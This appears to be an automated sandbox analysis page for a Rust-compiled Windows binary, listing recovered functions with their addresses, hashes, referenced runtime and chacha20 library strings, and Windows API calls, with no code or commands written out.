Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorFormatHandleLastMessageModulememset
String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\string.rs
API String ID: 1434010500-2033829299
Opcode ID: 1796e5168d3cd1b6465fb0b1be26defe1a49b0379b8526fce12db40180c71a3f
Instruction ID: b4556b6ce0d2bd4937dd4c4c0e7dc2288e2a30dc527846f781e8c78f78e98f15
Opcode Fuzzy Hash: 1796e5168d3cd1b6465fb0b1be26defe1a49b0379b8526fce12db40180c71a3f
Instruction Fuzzy Hash: 56A19532B09BC289E7718F20D8447F86395FB443D8F644236EA9D8ABD9DF799285D340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E6E950, Relevance: 8.4, APIs: 1, Strings: 4, Instructions: 914COMMON

Download Yara Rule

Strings

punycode{-}..._!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 00007FF606E6FB66
called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 00007FF606E6F5A8
'?for<, > as ::{shimclosure:#[]dyn + ; mut const unsafe extern ", xrefs: 00007FF606E6FD93, 00007FF606E6FE47, 00007FF606E6FED0
/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF606E6E956

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: '?for<, > as ::{shimclosure:#[]dyn + ; mut const unsafe extern "$/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$punycode{-}..._!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool
API String ID: 0-3505161736
Opcode ID: dba35a35d90abf3a50801dcd032ec0d6b7212fbb1d5fb86bf8512b51d35a2ab3
Instruction ID: 2cb95097de76b5b2bb288d142c640ea9919bf63c490d4c261ddd7ff12b850818
Opcode Fuzzy Hash: dba35a35d90abf3a50801dcd032ec0d6b7212fbb1d5fb86bf8512b51d35a2ab3
Instruction Fuzzy Hash: 9862F262F0CB9646EA608B15B4043B97792BB45BD4F644232EF9D877D9EE3EE542C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E31D70, Relevance: 5.7, Strings: 4, Instructions: 702COMMON

Download Yara Rule

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF606E589E1, 00007FF606E591DA
internal error: entered unreachable code/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\collections\btree\remove.rs, xrefs: 00007FF606E5928A
::::1, xrefs: 00007FF606E58DAC, 00007FF606E590DB
formatter error, xrefs: 00007FF606E58A0D, 00007FF606E59206

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ::::1$called `Result::unwrap()` on an `Err` value$formatter error$internal error: entered unreachable code/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\collections\btree\remove.rs
API String ID: 0-1827506649
Opcode ID: 505e4b84e47e6bc9a08c0506c1fc194df17290515819278ade1b55efe1b8afa4
Instruction ID: 8ed1686f70f432cefa2bc7c9e4e07e7ec96b6c551978a1a1d3033fb1dd2f903b
Opcode Fuzzy Hash: 505e4b84e47e6bc9a08c0506c1fc194df17290515819278ade1b55efe1b8afa4
Instruction Fuzzy Hash: 9E52AE32B0CB6289FB548F61E8403F927A1EB94798F608136DA8D87B99DF3ED545C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E3E6F0, Relevance: 5.2, Strings: 4, Instructions: 222COMMON

Download Yara Rule

Strings

2-by, xrefs: 00007FF606E3E790
expa, xrefs: 00007FF606E3E785
nd 3, xrefs: 00007FF606E3E78A
te k, xrefs: 00007FF606E3E796

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 2-by$expa$nd 3$te k
API String ID: 0-3581043453
Opcode ID: 5f267d956b0af7d04746fb83aff2ce044def7178e53d338cf764865a567784e9
Instruction ID: 963fdd1c26f95ce6ddd6a61380f10b0b7f9cf5725ebbc616b6d3615452f311d9
Opcode Fuzzy Hash: 5f267d956b0af7d04746fb83aff2ce044def7178e53d338cf764865a567784e9
Instruction Fuzzy Hash: 4E9126F79282808BE364CF19F44065ABBA4F798754F11A119EF8A93B14E739DA94CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E5C5C0, Relevance: 4.1, Strings: 3, Instructions: 316COMMON

Download Yara Rule

Strings

UNC\, xrefs: 00007FF606E5C77F
\\?\.\library\std\src\sys\windows\path.rsUNC\, xrefs: 00007FF606E5C605
/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF606E5C805

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs$UNC\$\\?\.\library\std\src\sys\windows\path.rsUNC\
API String ID: 0-1089172594
Opcode ID: 8bce9fc8ee9264375b6f801ffce50c1679433b2a5cd037092f781d73265d35f6
Instruction ID: 821aace739a07558fc99e6f26f3a59f77ef82873331d723796fbd48877e3615a
Opcode Fuzzy Hash: 8bce9fc8ee9264375b6f801ffce50c1679433b2a5cd037092f781d73265d35f6
Instruction Fuzzy Hash: 31C1F222A0C74185EB248B10D0606B977A0EB55F78F78433EEB6E876D4DF6EEA44C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E3EA30, Relevance: 3.1, Strings: 2, Instructions: 575COMMON

Download Yara Rule

Strings

called `Option::unwrap()` on a `None` valueC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\chacha20-0.6.0\src\chacha.rs, xrefs: 00007FF606E3F049, 00007FF606E3F314, 00007FF606E3F358, 00007FF606E3F388
@, xrefs: 00007FF606E3EA6A

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @$called `Option::unwrap()` on a `None` valueC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\chacha20-0.6.0\src\chacha.rs
API String ID: 0-2915282507
Opcode ID: cb52bba42d7eb84a8c24dfc03d219afb93455ccc25160c0aa88efeae4d3ad342
Instruction ID: 81edcbb25253bbe2f081f364f8fbaaf601ada301661e204df45a4a2f05f59d0d
Opcode Fuzzy Hash: cb52bba42d7eb84a8c24dfc03d219afb93455ccc25160c0aa88efeae4d3ad342
Instruction Fuzzy Hash: B2326866E2DBD541E702473C90052B9EB50FFAAB94F55D333DEA933691EF2996838200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E62B40, Relevance: 2.8, Strings: 2, Instructions: 279COMMON

Download Yara Rule

Strings

HygonGen, xrefs: 00007FF606E62EB6
Authenti, xrefs: 00007FF606E62E94

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: Authenti$HygonGen
API String ID: 0-2055753724
Opcode ID: 0cdff07ff8a564d3701b33ede90772b3f671708968539efec063901f5de394a0
Instruction ID: da71e6fdb7d6012b262e5d3ea84a97341abbd7bffa2d30cdbda64f3ea0b0869b
Opcode Fuzzy Hash: 0cdff07ff8a564d3701b33ede90772b3f671708968539efec063901f5de394a0
Instruction Fuzzy Hash: 9C8146A3B38A514AFF488615BC263BA4581A348BD0F1CA439FE5FEBB85DC7DD9418340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E3F3B0, Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E3F3FF
memmove.VCRUNTIME140 ref: 00007FF606E3F472

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 69ea8c796c55d0c546c91ebc33d4210e0bed5ddd9742313ba495e2ad8076b560
Instruction ID: 3fc920de5fc52eb4e1fca6679e1c56e4ea7e34b8310e9f3921926c2744b44a0c
Opcode Fuzzy Hash: 69ea8c796c55d0c546c91ebc33d4210e0bed5ddd9742313ba495e2ad8076b560
Instruction Fuzzy Hash: FD110522F0CBD581EA214B15A5043FA5320B799BE4F549330EE8D4779AEF2DE686C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E7A9F0, Relevance: 1.9, Instructions: 1864COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d2af1f3d63241999d8632e96a3eab4d70d8950b5a31e65f1062236b6781d808
Instruction ID: a1fe50ddad57529808d19a16123054613dbef2672981111f4ced568098d2db56
Opcode Fuzzy Hash: 4d2af1f3d63241999d8632e96a3eab4d70d8950b5a31e65f1062236b6781d808
Instruction Fuzzy Hash: 86037E6AE2DFC95AE313663C60132F6E2186FF71C9E50E317FEE0B1816EF5492426254

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E782B0, Relevance: 1.8, APIs: 1, Instructions: 583COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140 ref: 00007FF606E78347

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 8b60bfce310ae241fbe163c7d0a746a693e5a3e8042e341cd48bc2870acdc379
Instruction ID: ad8e4186d07e66cf99128d94ecfb4ab9c3f3566d3b52cb0a801a957a4c2d9e64
Opcode Fuzzy Hash: 8b60bfce310ae241fbe163c7d0a746a693e5a3e8042e341cd48bc2870acdc379
Instruction Fuzzy Hash: 38227866F2EB9245E7129A365404276A244AF73BC0F65C332FD5D72A96EF3EE5428300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E79A00, Relevance: 1.6, Strings: 1, Instructions: 383COMMON

Download Yara Rule

Strings

0x00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00007FF606E79A6B, 00007FF606E79B0A, 00007FF606E79BAA, 00007FF606E79C4D, 00007FF606E79CED, 00007FF606E79ECA

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 0x00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
API String ID: 0-485157861
Opcode ID: 022fda25478c891d57143d4aa513e8ab49dfd8f1b4c9e11f8770b32e6a1c422e
Instruction ID: d884a574d2124ff06122eebd4bfe04d84604a00cb6a0b641c4c56c2b8ad0a6ad
Opcode Fuzzy Hash: 022fda25478c891d57143d4aa513e8ab49dfd8f1b4c9e11f8770b32e6a1c422e
Instruction Fuzzy Hash: 6DE1F5B2A0C74186EB64CB58A4113F83792FB947A4FA08335C6AD9B7D6DF2E9509C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E76520, Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF606E76520, 00007FF606E76526

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs
API String ID: 0-3047668079
Opcode ID: 96521955ad15544aeda3e1853f34756a17bcbe7826e33cfd60639e819c7e5682
Instruction ID: f8c2c3f2ec9bad09ad565f9dd9ff9f38994341cd52c7f63ea3c6500e9d59e8ba
Opcode Fuzzy Hash: 96521955ad15544aeda3e1853f34756a17bcbe7826e33cfd60639e819c7e5682
Instruction Fuzzy Hash: B1818F56E2E75146EA138B3694012B5A750BF637D4F51C336FE5932AD6EF3EE1828300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E3E300, Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

called `Option::unwrap()` on a `None` valueC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\chacha20-0.6.0\src\chacha.rs, xrefs: 00007FF606E3E4C7

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: called `Option::unwrap()` on a `None` valueC:\Users\riser\.cargo\registry\src\github.com-1ecc6299db9ec823\chacha20-0.6.0\src\chacha.rs
API String ID: 0-3765904938
Opcode ID: 6dbb8e0475d9fa854329938f85787746df7a0d094e942674f68ce4f34747bbfe
Instruction ID: d90767395ec7b9365a3a95fc1e7353990300732cd5b0c8d06620f8e40e10fbf6
Opcode Fuzzy Hash: 6dbb8e0475d9fa854329938f85787746df7a0d094e942674f68ce4f34747bbfe
Instruction Fuzzy Hash: 1F419365D39F894AE303523C64022B6F314AFFB689F91E32BFDE871961EB1596C35204

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E60B10, Relevance: 1.3, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00007FF606E74679), ref: 00007FF606E60B50

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: bb1b5bc4feadc6d731c7370202ef0d6b03deb1bcd11d65b4178399e80a11e461
Instruction ID: d19b4e8c95a6318e71078eff3b6dd1aa6f1bd196372fa76dfe41b425145f303b
Opcode Fuzzy Hash: bb1b5bc4feadc6d731c7370202ef0d6b03deb1bcd11d65b4178399e80a11e461
Instruction Fuzzy Hash: 8DF0F452F5D75286FA0997D77A402BC0A515F89BF0E688434DE0E87B86ED2EA4838700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E33020, Relevance: .7, Instructions: 710COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01da12b4b642f8de671acfdfdfa472c04e86dc91759fe3302f036328b12d74ee
Instruction ID: a473cf7c857da1cf2a03e28008dea0d350664416528184658c61b193699750e9
Opcode Fuzzy Hash: 01da12b4b642f8de671acfdfdfa472c04e86dc91759fe3302f036328b12d74ee
Instruction Fuzzy Hash: 322216BBF7456047D35CCF59EC41B9A7692B394358B8AD138AE06D3F08E93CED064A80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E45720, Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4636dcc61f32659a9fecec4958b4c0b555a096ab77af096009bd806cc5dec62d
Instruction ID: 17205bfabbf7fb495783c3f2f2f9858b71ae1424638bbb3bf38c3770c95bcd7e
Opcode Fuzzy Hash: 4636dcc61f32659a9fecec4958b4c0b555a096ab77af096009bd806cc5dec62d
Instruction Fuzzy Hash: 36327F62D29BC586E3239739A4032F6E324AFEB3C5F10E326FED471D16EF6492419644

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E6C120, Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a5c67383fb490f7f535dfdcacd9eaa99dd1e68e397e81bace9bf78118203bf0
Instruction ID: 3739c5347b8695eb923c914ca2a67d1744c119d03b3b9c6aaf8320fb5e5cb090
Opcode Fuzzy Hash: 0a5c67383fb490f7f535dfdcacd9eaa99dd1e68e397e81bace9bf78118203bf0
Instruction Fuzzy Hash: 2A121A52E1C79142F7604B1499043BD27A1FBA9B94F759331EBAE837E1DF3EE5868200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E478E0, Relevance: .5, Instructions: 453COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb7e7ab8a87f227937c68d01beb54782f6dbfa6aba1448f4d3fc8830b1d61f3c
Instruction ID: 566fe2f30fc4d4528407cba965ea86d41324e63feabb620132df4344ab3dcade
Opcode Fuzzy Hash: bb7e7ab8a87f227937c68d01beb54782f6dbfa6aba1448f4d3fc8830b1d61f3c
Instruction Fuzzy Hash: 52223D62D29FC556F3239739A4032F6E324AFFB2D5F14E316FED070816EB6492829644

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E46F80, Relevance: .4, Instructions: 417COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22a12e8a9854d8565052e75ede223fe48d6d167b3bc0d6868ffd1ed73c2f89c4
Instruction ID: fa6c9bddcf447c06faafdcc92b9b76b5f453ad0e0ef793b2df51c48130b7939a
Opcode Fuzzy Hash: 22a12e8a9854d8565052e75ede223fe48d6d167b3bc0d6868ffd1ed73c2f89c4
Instruction Fuzzy Hash: 88222926D29FC595F3235B3CA4032F6E324AFFB295F14E316EED4B0C16EB6582429644

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E76A50, Relevance: .4, Instructions: 408COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 447be99bf5a5cb0befea8b7c0685d67a6b523ad03dbed002395364b40d458092
Instruction ID: bf452f651ce7de8ca284100e301137a71edba5015458df4428f6330d50d5db16
Opcode Fuzzy Hash: 447be99bf5a5cb0befea8b7c0685d67a6b523ad03dbed002395364b40d458092
Instruction Fuzzy Hash: 8BE17B56E2EB6204EE13463684011B597459FA37D0E6AC337FD6D716EAEF2FF1828204

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E3E510, Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cb162a8cc7690f90f52578033db2b7613cd1f6da8b169963db4ec255882ca57
Instruction ID: 79157b6aa1b4c8043f825040fda428c4412f7225cb06c35e4d2239ca0ba176b2
Opcode Fuzzy Hash: 4cb162a8cc7690f90f52578033db2b7613cd1f6da8b169963db4ec255882ca57
Instruction Fuzzy Hash: AF518E0A61D5D25BFF1A267294712FF6FD08B0A310F94B270C7E98BB83ED4DA4469361

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E5AE40, Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b3beb1543764a05aca4e2dd55b883e066dd2fa3947cc5c4648a224f90aae6aa
Instruction ID: 2c03d0103e86b0844b77dc97a58ad5882178b91b63d7b6e43521ec4b0fb11dd1
Opcode Fuzzy Hash: 4b3beb1543764a05aca4e2dd55b883e066dd2fa3947cc5c4648a224f90aae6aa
Instruction Fuzzy Hash: 9B5126A3F1D79146FB658B3885187B96791AB05BA0F764331CE7E872C1DE3E9982C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E54D90, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF606E54E1E
SetLastError.KERNEL32 ref: 00007FF606E54EAF
GetEnvironmentVariableW.KERNEL32 ref: 00007FF606E54EC1
GetLastError.KERNEL32 ref: 00007FF606E54ECC
GetLastError.KERNEL32 ref: 00007FF606E54EE1
GetLastError.KERNEL32 ref: 00007FF606E54F41

Strings

/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF606E54D97, 00007FF606E550BC

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnvironmentVariablememset
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs
API String ID: 3677577337-3047668079
Opcode ID: 541df0af01ddc851ca3a6e79d3f88c25d58b4ed7b14398c9ab80f9e4bbae3d0d
